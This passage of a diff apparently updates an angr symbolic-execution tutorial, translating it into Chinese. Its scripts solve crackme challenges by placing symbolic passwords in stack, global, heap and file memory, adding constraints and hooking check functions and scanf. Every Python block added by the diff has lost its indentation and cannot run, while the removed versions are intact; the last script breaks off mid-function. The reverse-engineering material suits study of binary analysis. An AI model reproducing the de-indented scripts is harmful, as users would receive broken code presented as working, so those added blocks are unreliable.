-  def is_successful(state):
-    stdout_output = state.posix.dumps(sys.stdout.fileno())
-    return 'Good Job.'.encode() in stdout_output
+def is_successful(state):
+stdout_output = state.posix.dumps(sys.stdout.fileno())
+return 'Good Job.'.encode() in stdout_output
 
-  def should_abort(state):
-    stdout_output = state.posix.dumps(sys.stdout.fileno())
-    return 'Try again.'.encode() in stdout_output
+def should_abort(state):
+stdout_output = state.posix.dumps(sys.stdout.fileno())
+return 'Try again.'.encode() in stdout_output
 
-  simulation.explore(find=is_successful, avoid=should_abort)
+simulation.explore(find=is_successful, avoid=should_abort)
 
-  if simulation.found:
-    solution_state = simulation.found[0]
+if simulation.found:
+solution_state = simulation.found[0]
 
-    solution0 = solution_state.solver.eval(password0)
-    solution1 = solution_state.solver.eval(password1)
-    solution2 = solution_state.solver.eval(password2)
+solution0 = solution_state.solver.eval(password0)
+solution1 = solution_state.solver.eval(password1)
+solution2 = solution_state.solver.eval(password2)
 
-    # Aggregate and format the solutions you computed above, and then print
-    # the full string. Pay attention to the order of the integers, and the
-    # expected base (decimal, octal, hexadecimal, etc).
-    solution = ' '.join(map('{:x}'.format, [ solution0, solution1, solution2 ]))  # :string
-    print(solution)
-  else:
-    raise Exception('Could not find the solution')
+# Aggregate and format the solutions you computed above, and then print
+# the full string. Pay attention to the order of the integers, and the
+# expected base (decimal, octal, hexadecimal, etc).
+solution = ' '.join(map('{:x}'.format, [ solution0, solution1, solution2 ]))  # :string
+print(solution)
+else:
+raise Exception('Could not find the solution')
 
 if __name__ == '__main__':
-  main(sys.argv)
+main(sys.argv)
 ```
-
-### Stack values
-
+### 堆栈值
 ```python
 # Put bit vectors in th stack to find out the vallue that stack position need to
 # have to reach a rogram flow
@@ -156,189 +149,183 @@ import claripy
 import sys
 
 def main(argv):
-  path_to_binary = argv[1]
-  project = angr.Project(path_to_binary)
+path_to_binary = argv[1]
+project = angr.Project(path_to_binary)
 
-  # Go to some address after the scanf where values have already being set in the stack
-  start_address = 0x8048697
-  initial_state = project.factory.blank_state(addr=start_address)
+# Go to some address after the scanf where values have already being set in the stack
+start_address = 0x8048697
+initial_state = project.factory.blank_state(addr=start_address)
 
-  # Since we are starting after scanf, we are skipping this stack construction
-  # step. To make up for this, we need to construct the stack ourselves. Let us
-  # start by initializing ebp in the exact same way the program does.
-  initial_state.regs.ebp = initial_state.regs.esp
+# Since we are starting after scanf, we are skipping this stack construction
+# step. To make up for this, we need to construct the stack ourselves. Let us
+# start by initializing ebp in the exact same way the program does.
+initial_state.regs.ebp = initial_state.regs.esp
 
-  # In this case scanf("%u %u") is used, so 2 BVS are going to be needed
-  password0 = claripy.BVS('password0', 32)
-  password1 = claripy.BVS('password1', 32)
+# In this case scanf("%u %u") is used, so 2 BVS are going to be needed
+password0 = claripy.BVS('password0', 32)
+password1 = claripy.BVS('password1', 32)
 
-  # Now, in the address were you have stopped, check were are the scanf values saved
-  # Then, substrack form the esp registry the needing padding to get to the
-  # part of the stack were the scanf values are being saved and push the BVS
-  # (see the image below to understan this -8)
-  padding_length_in_bytes = 8  # :integer
-  initial_state.regs.esp -= padding_length_in_bytes
+# Now, in the address were you have stopped, check were are the scanf values saved
+# Then, substrack form the esp registry the needing padding to get to the
+# part of the stack were the scanf values are being saved and push the BVS
+# (see the image below to understan this -8)
+padding_length_in_bytes = 8  # :integer
+initial_state.regs.esp -= padding_length_in_bytes
 
-  initial_state.stack_push(password0)
-  initial_state.stack_push(password1)
+initial_state.stack_push(password0)
+initial_state.stack_push(password1)
 
-  simulation = project.factory.simgr(initial_state)
+simulation = project.factory.simgr(initial_state)
 
-  def is_successful(state):
-    stdout_output = state.posix.dumps(sys.stdout.fileno())
-    return 'Good Job.'.encode() in stdout_output
+def is_successful(state):
+stdout_output = state.posix.dumps(sys.stdout.fileno())
+return 'Good Job.'.encode() in stdout_output
 
-  def should_abort(state):
-    stdout_output = state.posix.dumps(sys.stdout.fileno())
-    return 'Try again.'.encode() in stdout_output
+def should_abort(state):
+stdout_output = state.posix.dumps(sys.stdout.fileno())
+return 'Try again.'.encode() in stdout_output
 
-  simulation.explore(find=is_successful, avoid=should_abort)
+simulation.explore(find=is_successful, avoid=should_abort)
 
-  if simulation.found:
-    solution_state = simulation.found[0]
+if simulation.found:
+solution_state = simulation.found[0]
 
-    solution0 = solution_state.solver.eval(password0)
-    solution1 = solution_state.solver.eval(password1)
+solution0 = solution_state.solver.eval(password0)
+solution1 = solution_state.solver.eval(password1)
 
-    solution = ' '.join(map(str, [ solution0, solution1 ]))
-    print(solution)
-  else:
-    raise Exception('Could not find the solution')
+solution = ' '.join(map(str, [ solution0, solution1 ]))
+print(solution)
+else:
+raise Exception('Could not find the solution')
 
 if __name__ == '__main__':
-  main(sys.argv)
+main(sys.argv)
 ```
-
-In this scenario, the input was taken with `scanf("%u %u")` and the value `"1 1"` was given, so the values **`0x00000001`** of the stack come from the **user input**. You can see how this values starts in `$ebp - 8`. Therefore, in the code we have **subtracted 8 bytes to `$esp` (as in that moment `$ebp` and `$esp` had the same value)** and then we have pushed the BVS.
+在这个场景中，输入是通过 `scanf("%u %u")` 获取的，给定的值是 `"1 1"`，因此栈中的值 **`0x00000001`** 来自 **用户输入**。你可以看到这些值从 `$ebp - 8` 开始。因此，在代码中我们 **从 `$esp` 中减去了 8 字节（因为那时 `$ebp` 和 `$esp` 的值是相同的）**，然后我们推送了 BVS。
 
 ![](<../../../images/image (136).png>)
 
-### Static Memory values (Global variables)
-
+### 静态内存值（全局变量）
 ```python
 import angr
 import claripy
 import sys
 
 def main(argv):
-  path_to_binary = argv[1]
-  project = angr.Project(path_to_binary)
+path_to_binary = argv[1]
+project = angr.Project(path_to_binary)
 
-  #Get an address after the scanf. Once the input has already being saved in the memory positions
-  start_address = 0x8048606
-  initial_state = project.factory.blank_state(addr=start_address)
+#Get an address after the scanf. Once the input has already being saved in the memory positions
+start_address = 0x8048606
+initial_state = project.factory.blank_state(addr=start_address)
 
-  # The binary is calling scanf("%8s %8s %8s %8s").
-  # So we need 4 BVS of size 8*8
-  password0 = claripy.BVS('password0', 8*8)
-  password1 = claripy.BVS('password1', 8*8)
-  password2 = claripy.BVS('password2', 8*8)
-  password3 = claripy.BVS('password3', 8*8)
+# The binary is calling scanf("%8s %8s %8s %8s").
+# So we need 4 BVS of size 8*8
+password0 = claripy.BVS('password0', 8*8)
+password1 = claripy.BVS('password1', 8*8)
+password2 = claripy.BVS('password2', 8*8)
+password3 = claripy.BVS('password3', 8*8)
 
-  # Write the symbolic BVS in the memory positions
-  password0_address = 0xa29faa0
-  initial_state.memory.store(password0_address, password0)
-  password1_address = 0xa29faa8
-  initial_state.memory.store(password1_address, password1)
-  password2_address = 0xa29fab0
-  initial_state.memory.store(password2_address, password2)
-  password3_address = 0xa29fab8
-  initial_state.memory.store(password3_address, password3)
+# Write the symbolic BVS in the memory positions
+password0_address = 0xa29faa0
+initial_state.memory.store(password0_address, password0)
+password1_address = 0xa29faa8
+initial_state.memory.store(password1_address, password1)
+password2_address = 0xa29fab0
+initial_state.memory.store(password2_address, password2)
+password3_address = 0xa29fab8
+initial_state.memory.store(password3_address, password3)
 
-  simulation = project.factory.simgr(initial_state)
+simulation = project.factory.simgr(initial_state)
 
-  def is_successful(state):
-    stdout_output = state.posix.dumps(sys.stdout.fileno())
-    return 'Good Job.'.encode() in stdout_output
+def is_successful(state):
+stdout_output = state.posix.dumps(sys.stdout.fileno())
+return 'Good Job.'.encode() in stdout_output
 
-  def should_abort(state):
-    stdout_output = state.posix.dumps(sys.stdout.fileno())
-    return 'Try again.'.encode() in stdout_output
+def should_abort(state):
+stdout_output = state.posix.dumps(sys.stdout.fileno())
+return 'Try again.'.encode() in stdout_output
 
-  simulation.explore(find=is_successful, avoid=should_abort)
+simulation.explore(find=is_successful, avoid=should_abort)
 
-  if simulation.found:
-    solution_state = simulation.found[0]
+if simulation.found:
+solution_state = simulation.found[0]
 
-    # Get the values the memory addresses should store
-    solution0 = solution_state.solver.eval(password0,cast_to=bytes).decode()
-    solution1 = solution_state.solver.eval(password1,cast_to=bytes).decode()
-    solution2 = solution_state.solver.eval(password2,cast_to=bytes).decode()
-    solution3 = solution_state.solver.eval(password3,cast_to=bytes).decode()
+# Get the values the memory addresses should store
+solution0 = solution_state.solver.eval(password0,cast_to=bytes).decode()
+solution1 = solution_state.solver.eval(password1,cast_to=bytes).decode()
+solution2 = solution_state.solver.eval(password2,cast_to=bytes).decode()
+solution3 = solution_state.solver.eval(password3,cast_to=bytes).decode()
 
-    solution = ' '.join([ solution0, solution1, solution2, solution3 ])
+solution = ' '.join([ solution0, solution1, solution2, solution3 ])
 
-    print(solution)
-  else:
-    raise Exception('Could not find the solution')
+print(solution)
+else:
+raise Exception('Could not find the solution')
 
 if __name__ == '__main__':
-  main(sys.argv)
+main(sys.argv)
 ```
-
-### Dynamic Memory Values (Malloc)
-
+### 动态内存值（Malloc）
 ```python
 import angr
 import claripy
 import sys
 
 def main(argv):
-  path_to_binary = argv[1]
-  project = angr.Project(path_to_binary)
+path_to_binary = argv[1]
+project = angr.Project(path_to_binary)
 
-  # Get address after scanf
-  start_address = 0x804869e
-  initial_state = project.factory.blank_state(addr=start_address)
+# Get address after scanf
+start_address = 0x804869e
+initial_state = project.factory.blank_state(addr=start_address)
 
-  # The binary is calling scanf("%8s %8s") so 2 BVS are needed.
-  password0 = claripy.BVS('password0', 8*8)
-  password1 = claripy.BVS('password0', 8*8)
+# The binary is calling scanf("%8s %8s") so 2 BVS are needed.
+password0 = claripy.BVS('password0', 8*8)
+password1 = claripy.BVS('password0', 8*8)
 
-  # Find a coupble of addresses that aren't used by the binary (like 0x4444444 & 0x4444454)
-  # The address generated by mallosc is going to be saved in some address
-  # Then, make that address point to the fake heap addresses were the BVS are going to be saved
-  fake_heap_address0 = 0x4444444
-  pointer_to_malloc_memory_address0 = 0xa79a118
-  initial_state.memory.store(pointer_to_malloc_memory_address0, fake_heap_address0, endness=project.arch.memory_endness)
-  fake_heap_address1 = 0x4444454
-  pointer_to_malloc_memory_address1 = 0xa79a120
-  initial_state.memory.store(pointer_to_malloc_memory_address1, fake_heap_address1, endness=project.arch.memory_endness)
+# Find a coupble of addresses that aren't used by the binary (like 0x4444444 & 0x4444454)
+# The address generated by mallosc is going to be saved in some address
+# Then, make that address point to the fake heap addresses were the BVS are going to be saved
+fake_heap_address0 = 0x4444444
+pointer_to_malloc_memory_address0 = 0xa79a118
+initial_state.memory.store(pointer_to_malloc_memory_address0, fake_heap_address0, endness=project.arch.memory_endness)
+fake_heap_address1 = 0x4444454
+pointer_to_malloc_memory_address1 = 0xa79a120
+initial_state.memory.store(pointer_to_malloc_memory_address1, fake_heap_address1, endness=project.arch.memory_endness)
 
-  # Save the VBS in the new fake heap addresses created
-  initial_state.memory.store(fake_heap_address0, password0)
-  initial_state.memory.store(fake_heap_address1, password1)
+# Save the VBS in the new fake heap addresses created
+initial_state.memory.store(fake_heap_address0, password0)
+initial_state.memory.store(fake_heap_address1, password1)
 
-  simulation = project.factory.simgr(initial_state)
+simulation = project.factory.simgr(initial_state)
 
-  def is_successful(state):
-    stdout_output = state.posix.dumps(sys.stdout.fileno())
-    return 'Good Job.'.encode() in stdout_output
+def is_successful(state):
+stdout_output = state.posix.dumps(sys.stdout.fileno())
+return 'Good Job.'.encode() in stdout_output
 
-  def should_abort(state):
-    stdout_output = state.posix.dumps(sys.stdout.fileno())
-    return 'Try again.'.encode() in stdout_output
+def should_abort(state):
+stdout_output = state.posix.dumps(sys.stdout.fileno())
+return 'Try again.'.encode() in stdout_output
 
-  simulation.explore(find=is_successful, avoid=should_abort)
+simulation.explore(find=is_successful, avoid=should_abort)
 
-  if simulation.found:
-    solution_state = simulation.found[0]
+if simulation.found:
+solution_state = simulation.found[0]
 
-    solution0 = solution_state.solver.eval(password0,cast_to=bytes).decode()
-    solution1 = solution_state.solver.eval(password1,cast_to=bytes).decode()
+solution0 = solution_state.solver.eval(password0,cast_to=bytes).decode()
+solution1 = solution_state.solver.eval(password1,cast_to=bytes).decode()
 
-    solution = ' '.join([ solution0, solution1 ])
+solution = ' '.join([ solution0, solution1 ])
 
-    print(solution)
-  else:
-    raise Exception('Could not find the solution')
+print(solution)
+else:
+raise Exception('Could not find the solution')
 
 if __name__ == '__main__':
-  main(sys.argv)
+main(sys.argv)
 ```
-
-### File Simulation
-
+### 文件模拟
 ```python
 #In this challenge a password is read from a file and we want to simulate its content
 
@@ -347,83 +334,80 @@ import claripy
 import sys
 
 def main(argv):
-  path_to_binary = argv[1]
-  project = angr.Project(path_to_binary)
+path_to_binary = argv[1]
+project = angr.Project(path_to_binary)
 
-  # Get an address just before opening the file with th simbolic content
-  # Or at least when the file is not going to suffer more changes before being read
-  start_address = 0x80488db
-  initial_state = project.factory.blank_state(addr=start_address)
+# Get an address just before opening the file with th simbolic content
+# Or at least when the file is not going to suffer more changes before being read
+start_address = 0x80488db
+initial_state = project.factory.blank_state(addr=start_address)
 
-  # Specify the filena that is going to open
-  # Note that in theory, the filename could be symbolic.
-  filename = 'WCEXPXBW.txt'
-  symbolic_file_size_bytes = 64
+# Specify the filena that is going to open
+# Note that in theory, the filename could be symbolic.
+filename = 'WCEXPXBW.txt'
+symbolic_file_size_bytes = 64
 
-  # Create a BV which is going to be the content of the simbolic file
-  password = claripy.BVS('password', symbolic_file_size_bytes * 8)
+# Create a BV which is going to be the content of the simbolic file
+password = claripy.BVS('password', symbolic_file_size_bytes * 8)
 
-  # Create the file simulation with the simbolic content
-  password_file = angr.storage.SimFile(filename, content=password)
+# Create the file simulation with the simbolic content
+password_file = angr.storage.SimFile(filename, content=password)
 
-  # Add the symbolic file we created to the symbolic filesystem.
-  initial_state.fs.insert(filename, password_file)
+# Add the symbolic file we created to the symbolic filesystem.
+initial_state.fs.insert(filename, password_file)
 
-  simulation = project.factory.simgr(initial_state)
+simulation = project.factory.simgr(initial_state)
 
-  def is_successful(state):
-    stdout_output = state.posix.dumps(sys.stdout.fileno())
-    return 'Good Job.'.encode() in stdout_output
+def is_successful(state):
+stdout_output = state.posix.dumps(sys.stdout.fileno())
+return 'Good Job.'.encode() in stdout_output
 
-  def should_abort(state):
-    stdout_output = state.posix.dumps(sys.stdout.fileno())
-    return 'Try again.'.encode() in stdout_output
+def should_abort(state):
+stdout_output = state.posix.dumps(sys.stdout.fileno())
+return 'Try again.'.encode() in stdout_output
 
-  simulation.explore(find=is_successful, avoid=should_abort)
+simulation.explore(find=is_successful, avoid=should_abort)
 
-  if simulation.found:
-    solution_state = simulation.found[0]
+if simulation.found:
+solution_state = simulation.found[0]
 
-    solution = solution_state.solver.eval(password,cast_to=bytes).decode()
+solution = solution_state.solver.eval(password,cast_to=bytes).decode()
 
-    print(solution)
-  else:
-    raise Exception('Could not find the solution')
+print(solution)
+else:
+raise Exception('Could not find the solution')
 
 if __name__ == '__main__':
-  main(sys.argv)
+main(sys.argv)
 ```
-
 > [!NOTE]
-> Note that the symbolic file could also contain constant data merged with symbolic data:
+> 请注意，符号文件也可能包含与符号数据合并的常量数据：
 >
 > ```python
 >   # Hello world, my name is John.
 >   # ^                       ^
->   # ^ address 0             ^ address 24 (count the number of characters)
->   # In order to represent this in memory, we would want to write the string to
->   # the beginning of the file:
+>   # ^ 地址 0             ^ 地址 24 (计算字符数)
+>   # 为了在内存中表示这一点，我们希望将字符串写入
+>   # 文件的开头：
 >   #
 >   # hello_txt_contents = claripy.BVV('Hello world, my name is John.', 30*8)
 >   #
->   # Perhaps, then, we would want to replace John with a
->   # symbolic variable. We would call:
+>   # 然后，也许我们希望用一个
+>   # 符号变量替换 John。我们会调用：
 >   #
 >   # name_bitvector = claripy.BVS('symbolic_name', 4*8)
 >   #
->   # Then, after the program calls fopen('hello.txt', 'r') and then
->   # fread(buffer, sizeof(char), 30, hello_txt_file), the buffer would contain
->   # the string from the file, except four symbolic bytes where the name would be
->   # stored.
+>   # 然后，在程序调用 fopen('hello.txt', 'r') 并且
+>   # fread(buffer, sizeof(char), 30, hello_txt_file) 之后，缓冲区将包含
+>   # 文件中的字符串，除了四个符号字节，其中将存储名称。
 >   # (!)
 > ```
 
-### Applying Constrains
+### 应用约束
 
 > [!NOTE]
-> Sometimes simple human operations like compare 2 words of length 16 **char by char** (loop), **cost** a lot to a **angr** because it needs to generate branches **exponentially** because it generates 1 branch per if: `2^16`\
-> Therefore, it's easier to **ask angr get to a previous point** (where the real difficult part was already done) and **set those constrains manually**.
-
+> 有时，简单的人类操作，比如逐个字符比较两个长度为 16 的单词（循环），**对** **angr** **的成本**很高，因为它需要生成**指数级**的分支，因为它每个 if 生成 1 个分支：`2^16`\
+> 因此，更容易**让 angr 回到一个之前的点**（在那里真正困难的部分已经完成）并**手动设置这些约束**。
 ```python
 # After perform some complex poperations to the input the program checks
 # char by char the password against another password saved, like in the snippet:
@@ -459,93 +443,89 @@ import claripy
 import sys
 
 def main(argv):
-  path_to_binary = argv[1]
-  project = angr.Project(path_to_binary)
+path_to_binary = argv[1]
+project = angr.Project(path_to_binary)
 
-  initial_state = project.factory.entry_state()
+initial_state = project.factory.entry_state()
 
-  simulation = project.factory.simgr(initial_state)
+simulation = project.factory.simgr(initial_state)
 
-  # Get an address to check after the complex function and before the "easy compare" operation
-  address_to_check_constraint = 0x8048671
-  simulation.explore(find=address_to_check_constraint)
+# Get an address to check after the complex function and before the "easy compare" operation
+address_to_check_constraint = 0x8048671
+simulation.explore(find=address_to_check_constraint)
 
 
-  if simulation.found:
-    solution_state = simulation.found[0]
+if simulation.found:
+solution_state = simulation.found[0]
 
-    # Find were the input that is going to be compared is saved in memory
-    constrained_parameter_address = 0x804a050
-    constrained_parameter_size_bytes = 16
-    # Set the bitvector
-    constrained_parameter_bitvector = solution_state.memory.load(
-      constrained_parameter_address,
-      constrained_parameter_size_bytes
-    )
+# Find were the input that is going to be compared is saved in memory
+constrained_parameter_address = 0x804a050
+constrained_parameter_size_bytes = 16
+# Set the bitvector
+constrained_parameter_bitvector = solution_state.memory.load(
+constrained_parameter_address,
+constrained_parameter_size_bytes
+)
 
-    # Indicate angr that this BV at this point needs to be equal to the password
-    constrained_parameter_desired_value = 'BWYRUBQCMVSBRGFU'.encode()
-    solution_state.add_constraints(constrained_parameter_bitvector == constrained_parameter_desired_value)
+# Indicate angr that this BV at this point needs to be equal to the password
+constrained_parameter_desired_value = 'BWYRUBQCMVSBRGFU'.encode()
+solution_state.add_constraints(constrained_parameter_bitvector == constrained_parameter_desired_value)
 
-    print(solution_state.posix.dumps(sys.stdin.fileno()))
-  else:
-    raise Exception('Could not find the solution')
+print(solution_state.posix.dumps(sys.stdin.fileno()))
+else:
+raise Exception('Could not find the solution')
 
 if __name__ == '__main__':
-  main(sys.argv)
+main(sys.argv)
 ```
-
 > [!CAUTION]
-> In some scenarios you can activate **veritesting**, which will merge similar status, in order to save useless branches and find the solution: `simulation = project.factory.simgr(initial_state, veritesting=True)`
+> 在某些情况下，您可以激活 **veritesting**，这将合并相似的状态，以节省无用的分支并找到解决方案： `simulation = project.factory.simgr(initial_state, veritesting=True)`
 
 > [!NOTE]
-> Another thing you can do in these scenarios is to **hook the function giving angr something it can understand** more easily.
+> 在这些情况下，您还可以 **hook 函数，给 angr 一些它可以更容易理解的东西**。
 
 ### Simulation Managers
 
-Some simulation managers can be more useful than others. In the previous example there was a problem as a lot of useful branches were created. Here, the **veritesting** technique will merge those and will find a solution.\
-This simulation manager can also be activated with: `simulation = project.factory.simgr(initial_state, veritesting=True)`
-
+一些模拟管理器可能比其他的更有用。在前面的例子中，存在一个问题，因为创建了很多有用的分支。在这里，**veritesting** 技术将合并这些分支并找到解决方案。\
+这个模拟管理器也可以通过以下方式激活： `simulation = project.factory.simgr(initial_state, veritesting=True)`
 ```python
 import angr
 import claripy
 import sys
 
 def main(argv):
-  path_to_binary = argv[1]
-  project = angr.Project(path_to_binary)
+path_to_binary = argv[1]
+project = angr.Project(path_to_binary)
 
-  initial_state = project.factory.entry_state()
+initial_state = project.factory.entry_state()
 
-  simulation = project.factory.simgr(initial_state)
-  # Set simulation technique
-  simulation.use_technique(angr.exploration_techniques.Veritesting())
+simulation = project.factory.simgr(initial_state)
+# Set simulation technique
+simulation.use_technique(angr.exploration_techniques.Veritesting())
 
 
-  def is_successful(state):
-    stdout_output = state.posix.dumps(sys.stdout.fileno())
+def is_successful(state):
+stdout_output = state.posix.dumps(sys.stdout.fileno())
 
-    return 'Good Job.'.encode() in stdout_output  # :boolean
+return 'Good Job.'.encode() in stdout_output  # :boolean
 
-  def should_abort(state):
-    stdout_output = state.posix.dumps(sys.stdout.fileno())
-    return 'Try again.'.encode() in stdout_output  # :boolean
+def should_abort(state):
+stdout_output = state.posix.dumps(sys.stdout.fileno())
+return 'Try again.'.encode() in stdout_output  # :boolean
 
-  simulation.explore(find=is_successful, avoid=should_abort)
+simulation.explore(find=is_successful, avoid=should_abort)
 
-  if simulation.found:
-    solution_state = simulation.found[0]
-    print(solution_state.posix.dumps(sys.stdin.fileno()))
-  else:
-    raise Exception('Could not find the solution')
+if simulation.found:
+solution_state = simulation.found[0]
+print(solution_state.posix.dumps(sys.stdin.fileno()))
+else:
+raise Exception('Could not find the solution')
 
 
 if __name__ == '__main__':
-  main(sys.argv)
+main(sys.argv)
 ```
-
-### Hooking/Bypassing one call to a function
-
+### 钩子/绕过对一个函数的调用
 ```python
 # This level performs the following computations:
 #
@@ -563,59 +543,57 @@ import claripy
 import sys
 
 def main(argv):
-  path_to_binary = argv[1]
-  project = angr.Project(path_to_binary)
+path_to_binary = argv[1]
+project = angr.Project(path_to_binary)
 
-  initial_state = project.factory.entry_state()
+initial_state = project.factory.entry_state()
 
-  # Hook the address of the call to hook indicating th length of the instruction (of the call)
-  check_equals_called_address = 0x80486b8
-  instruction_to_skip_length = 5
-  @project.hook(check_equals_called_address, length=instruction_to_skip_length)
-  def skip_check_equals_(state):
-    #Load the input of the function reading direcly the memory
-    user_input_buffer_address = 0x804a054
-    user_input_buffer_length = 16
-    user_input_string = state.memory.load(
-      user_input_buffer_address,
-      user_input_buffer_length
-    )
+# Hook the address of the call to hook indicating th length of the instruction (of the call)
+check_equals_called_address = 0x80486b8
+instruction_to_skip_length = 5
+@project.hook(check_equals_called_address, length=instruction_to_skip_length)
+def skip_check_equals_(state):
+#Load the input of the function reading direcly the memory
+user_input_buffer_address = 0x804a054
+user_input_buffer_length = 16
+user_input_string = state.memory.load(
+user_input_buffer_address,
+user_input_buffer_length
+)
 
-    # Create a simbolic IF that if the loaded string frommemory is the expected
-    # return True (1) if not returns False (0) in eax
-    check_against_string = 'XKSPZSJKJYQCQXZV'.encode() # :string
+# Create a simbolic IF that if the loaded string frommemory is the expected
+# return True (1) if not returns False (0) in eax
+check_against_string = 'XKSPZSJKJYQCQXZV'.encode() # :string
 
-    state.regs.eax = claripy.If(
-      user_input_string == check_against_string,
-      claripy.BVV(1, 32),
-      claripy.BVV(0, 32)
-    )
+state.regs.eax = claripy.If(
+user_input_string == check_against_string,
+claripy.BVV(1, 32),
+claripy.BVV(0, 32)
+)
 
-  simulation = project.factory.simgr(initial_state)
+simulation = project.factory.simgr(initial_state)
 
-  def is_successful(state):
-    stdout_output = state.posix.dumps(sys.stdout.fileno())
-    return 'Good Job.'.encode() in stdout_output
+def is_successful(state):
+stdout_output = state.posix.dumps(sys.stdout.fileno())
+return 'Good Job.'.encode() in stdout_output
 
-  def should_abort(state):
-    stdout_output = state.posix.dumps(sys.stdout.fileno())
-    return 'Try again.'.encode() in stdout_output
+def should_abort(state):
+stdout_output = state.posix.dumps(sys.stdout.fileno())
+return 'Try again.'.encode() in stdout_output
 
-  simulation.explore(find=is_successful, avoid=should_abort)
+simulation.explore(find=is_successful, avoid=should_abort)
 
-  if simulation.found:
-    solution_state = simulation.found[0]
-    solution = solution_state.posix.dumps(sys.stdin.fileno()).decode()
-    print(solution)
-  else:
-    raise Exception('Could not find the solution')
+if simulation.found:
+solution_state = simulation.found[0]
+solution = solution_state.posix.dumps(sys.stdin.fileno()).decode()
+print(solution)
+else:
+raise Exception('Could not find the solution')
 
 if __name__ == '__main__':
-  main(sys.argv)
+main(sys.argv)
 ```
-
-### Hooking a function / Simprocedure
-
+### 钩住一个函数 / Simprocedure
 ```python
 # Hook to the function called check_equals_WQNDNKKWAWOLXBAC
 
@@ -624,84 +602,82 @@ import claripy
 import sys
 
 def main(argv):
-  path_to_binary = argv[1]
-  project = angr.Project(path_to_binary)
+path_to_binary = argv[1]
+project = angr.Project(path_to_binary)
 
-  initial_state = project.factory.entry_state()
+initial_state = project.factory.entry_state()
 
-  # Define a class and a tun method to hook completelly a function
-  class ReplacementCheckEquals(angr.SimProcedure):
-    # This C code:
-    #
-    # int add_if_positive(int a, int b) {
-    #   if (a >= 0 && b >= 0) return a + b;
-    #   else return 0;
-    # }
-    #
-    # could be simulated with python:
-    #
-    # class ReplacementAddIfPositive(angr.SimProcedure):
-    #   def run(self, a, b):
-    #     if a >= 0 and b >=0:
-    #       return a + b
-    #     else:
-    #       return 0
-    #
-    # run(...) receives the params of the hooked function
-    def run(self, to_check, length):
-      user_input_buffer_address = to_check
-      user_input_buffer_length = length
+# Define a class and a tun method to hook completelly a function
+class ReplacementCheckEquals(angr.SimProcedure):
+# This C code:
+#
+# int add_if_positive(int a, int b) {
+#   if (a >= 0 && b >= 0) return a + b;
+#   else return 0;
+# }
+#
+# could be simulated with python:
+#
+# class ReplacementAddIfPositive(angr.SimProcedure):
+#   def run(self, a, b):
+#     if a >= 0 and b >=0:
+#       return a + b
+#     else:
+#       return 0
+#
+# run(...) receives the params of the hooked function
+def run(self, to_check, length):
+user_input_buffer_address = to_check
+user_input_buffer_length = length
 
-      # Read the data from the memory address given to the function
-      user_input_string = self.state.memory.load(
-        user_input_buffer_address,
-        user_input_buffer_length
-      )
+# Read the data from the memory address given to the function
+user_input_string = self.state.memory.load(
+user_input_buffer_address,
+user_input_buffer_length
+)
 
-      check_against_string = 'WQNDNKKWAWOLXBAC'.encode()
+check_against_string = 'WQNDNKKWAWOLXBAC'.encode()
 
-      # Return 1 if equals to the string, 0 otherways
-      return claripy.If(
-        user_input_string == check_against_string,
-        claripy.BVV(1, 32),
-        claripy.BVV(0, 32)
-      )
+# Return 1 if equals to the string, 0 otherways
+return claripy.If(
+user_input_string == check_against_string,
+claripy.BVV(1, 32),
+claripy.BVV(0, 32)
+)
 
 
-  # Hook the check_equals symbol. Angr automatically looks up the address
-  # associated with the symbol. Alternatively, you can use 'hook' instead
-  # of 'hook_symbol' and specify the address of the function. To find the
-  # correct symbol, disassemble the binary.
-  # (!)
-  check_equals_symbol = 'check_equals_WQNDNKKWAWOLXBAC' # :string
-  project.hook_symbol(check_equals_symbol, ReplacementCheckEquals())
+# Hook the check_equals symbol. Angr automatically looks up the address
+# associated with the symbol. Alternatively, you can use 'hook' instead
+# of 'hook_symbol' and specify the address of the function. To find the
+# correct symbol, disassemble the binary.
+# (!)
+check_equals_symbol = 'check_equals_WQNDNKKWAWOLXBAC' # :string
+project.hook_symbol(check_equals_symbol, ReplacementCheckEquals())
 
-  simulation = project.factory.simgr(initial_state)
+simulation = project.factory.simgr(initial_state)
 
-  def is_successful(state):
-    stdout_output = state.posix.dumps(sys.stdout.fileno())
-    return 'Good Job.'.encode() in stdout_output
+def is_successful(state):
+stdout_output = state.posix.dumps(sys.stdout.fileno())
+return 'Good Job.'.encode() in stdout_output
 
-  def should_abort(state):
-    stdout_output = state.posix.dumps(sys.stdout.fileno())
-    return 'Try again.'.encode() in stdout_output
+def should_abort(state):
+stdout_output = state.posix.dumps(sys.stdout.fileno())
+return 'Try again.'.encode() in stdout_output
 
-  simulation.explore(find=is_successful, avoid=should_abort)
+simulation.explore(find=is_successful, avoid=should_abort)
 
-  if simulation.found:
-    solution_state = simulation.found[0]
+if simulation.found:
+solution_state = simulation.found[0]
 
-    solution = solution_state.posix.dumps(sys.stdin.fileno()).decode()
-    print(solution)
-  else:
-    raise Exception('Could not find the solution')
+solution = solution_state.posix.dumps(sys.stdin.fileno()).decode()
+print(solution)
+else:
+raise Exception('Could not find the solution')
 
 if __name__ == '__main__':
-  main(sys.argv)
+main(sys.argv)
 ```
-
-### Simulate scanf with several params
-
+### 使用多个参数模拟 scanf
 ```python
 # This time, the solution involves simply replacing scanf with our own version,
 # since Angr does not support requesting multiple parameters with scanf.
@@ -711,61 +687,59 @@ import claripy
 import sys
 
 def main(argv):
-  path_to_binary = argv[1]
-  project = angr.Project(path_to_binary)
+path_to_binary = argv[1]
+project = angr.Project(path_to_binary)
 
-  initial_state = project.factory.entry_state()
+initial_state = project.factory.entry_state()
 
-  class ReplacementScanf(angr.SimProcedure):
-    # The code uses: 'scanf("%u %u", ...)'
-    def run(self, format_string, param0, param1):
-      scanf0 = claripy.BVS('scanf0', 32)
-      scanf1 = claripy.BVS('scanf1', 32)
+class ReplacementScanf(angr.SimProcedure):
+# The code uses: 'scanf("%u %u", ...)'
+def run(self, format_string, param0, param1):
+scanf0 = claripy.BVS('scanf0', 32)
+scanf1 = claripy.BVS('scanf1', 32)
 
-      # Get the addresses from the params and store the BVS in memory
-      scanf0_address = param0
-      self.state.memory.store(scanf0_address, scanf0, endness=project.arch.memory_endness)
-      scanf1_address = param1
-      self.state.memory.store(scanf1_address, scanf1, endness=project.arch.memory_endness)
+# Get the addresses from the params and store the BVS in memory
+scanf0_address = param0
+self.state.memory.store(scanf0_address, scanf0, endness=project.arch.memory_endness)
+scanf1_address = param1
+self.state.memory.store(scanf1_address, scanf1, endness=project.arch.memory_endness)
 
-      # Now, we want to 'set aside' references to our symbolic values in the
-      # globals plugin included by default with a state. You will need to
-      # store multiple bitvectors. You can either use a list, tuple, or multiple
